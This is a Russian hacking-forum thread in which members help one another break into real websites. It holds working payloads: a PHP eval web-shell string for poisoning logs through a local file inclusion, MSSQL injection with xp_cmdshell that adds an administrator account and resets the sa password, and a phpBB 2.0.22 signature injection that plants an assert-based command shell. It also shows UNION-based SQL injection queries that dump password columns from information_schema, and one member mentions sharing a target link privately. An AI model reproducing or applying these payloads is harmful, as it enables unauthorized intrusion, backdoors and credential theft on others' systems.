Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Dare

    Dare Elder - Старейшина

    Joined:
    26 Apr 2010
    Messages:
    53
    Likes Received:
    24
    Reputations:
    17
    Когда можно внедрить команды в запрос, и имеется file_priv (естественно кавычки не должны слешироваться)
    Обычно такой способ используется в слепых скулях.
     
  2. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    LFI

    есть LFI, нашел еrror.log и access.log, access читать не получается т.к. размер большой, остался только еrror.
    Делаю запрос вида http://www.site.com/<? траляля ?>
    В лог пишется %3C? траляля ?%3E.
    Что же делать?)
     
  3. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    <?php file_get_contents('http://lala.com/<?php eval(stripslashes($_REQUEST[lol]));?>');?>
     
    1 person likes this.
  4. FAQ666

    FAQ666 Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    38
    Likes Received:
    18
    Reputations:
    8
    [uri "/%3C?php%20file_get_contents('http://lala.com/%3C?php%20eval(stripslashes($_REQUEST[lol]));?%3E');?%3E"]
     
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну если ты это в адресную строку прямо все забил, то не удивительно. Ми тебе намекгул как бы, что запрос можно выполнить просто сторонним скриптом, или интекрякерами всякими, как тебе удобнее.

    PS: Выполнить запрос сторонним скриптом - это значит выполнить скрипт, а не набирать его код в адресной строке браузера
     
    2 people like this.
  6. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    в mssql если имя пользователя не sa при запросе:

    http://test/news.asp?id=1+or+1=(select+system_user)--

    то как я понимаю у меня не будет прав на выполнения команд?
     
  7. shell_c0de

    shell_c0de Hack All World

    Joined:
    7 Jul 2009
    Messages:
    1,178
    Likes Received:
    617
    Reputations:
    690
    2pinch нет от этого не зависеть
    если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
    в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
    ?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--
     
    _________________________
    #12607 shell_c0de, 30 Apr 2010
    Last edited: 30 Apr 2010
  8. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Как в phpBB 2.0.22 обойти usercp_avatar.php ??
    не получаеться залить шел через аватарку. видно стоит обработка скриптом!

    Или что можно воткнут в место phpinfo()
    в
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:phpinfo()' WHERE user_id=4;

    штоб шел залить??
     
    #12608 GOGA075, 30 Apr 2010
    Last edited: 30 Apr 2010
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    есть таблица users

    table_rows - 6

    есть колонки name,pass

    когда делаю запрос union+select+......version()+from+users то все нормально

    а запрос union+select+......pass+from+users ничего не выдает

    что посоветуете?
     
    _________________________
  10. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Konqi, попробуй shar() либо concat_ws()
     
  11. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    Konqi проверь если не пустая табла
    union+select+1,2,count(*),4+from+users

    count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
    либо для 5 ветки так
    union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
    и если табла в нужной базe
    union+select+1,2,pass,4+from+database_name.users
    hex(unhex())
    aes_encrypt....
    GOGA075
    concat обьеденяет запросы..причем тут конкатирование?
     
    #12611 Gorev, 30 Apr 2010
    Last edited: 30 Apr 2010
    2 people like this.
  12. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.
     
    _________________________
  13. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    budden, и что мне этот код даст?
    он мне просто ошибку выдает...
     
  14. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    GOGA075
    UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbb:assert(stripslashes($_REQUEST[cmd]));' WHERE user_id=2;

    then blablablabla......editprofile&cmd=phpinfo();
     
    1 person likes this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    count(*) выдает 4
     
    _________________________
  16. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    узнай в какой базе таблица users... потом from+*base*.users
     
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    [Feldmarschall]

    с базой нет проблем, так и делаю

    а unhex(hex()) и aes_decrypt(aes_encrypt не помогли
     
    _________________________
  18. GOGA075

    GOGA075 Elder - Старейшина

    Joined:
    30 Mar 2008
    Messages:
    208
    Likes Received:
    10
    Reputations:
    11
    Реально отключить обработку картинки из админки в phpBB??
     
  19. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    кароче там много баз.. и почти в каждой есть users..
    первая запись (limit+0,1) пуста 1,1 все идет.. линк скинул в пм есле что..
    вот так допустим можешь действовать на остальных Датабазах
    PHP:
    +union+select+group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns Where table_schema=0x63775F3631303334 AND table_name=0x77705F30317573657273--
    PHP:
    +union+select+group_concat(column_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+information_schema.columns Where table_schema=0x63775F36313033345F636F756E74696573 AND table_name=0x77705F7573657273--
     
    #12619 Дирижабль, 1 May 2010
    Last edited: 1 May 2010
    3 people like this.
  20. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    [Feldmarschall]

    интересно, даже очень ))

    спасибо !!
     
    _________________________
Thread Status:
Not open for further replies.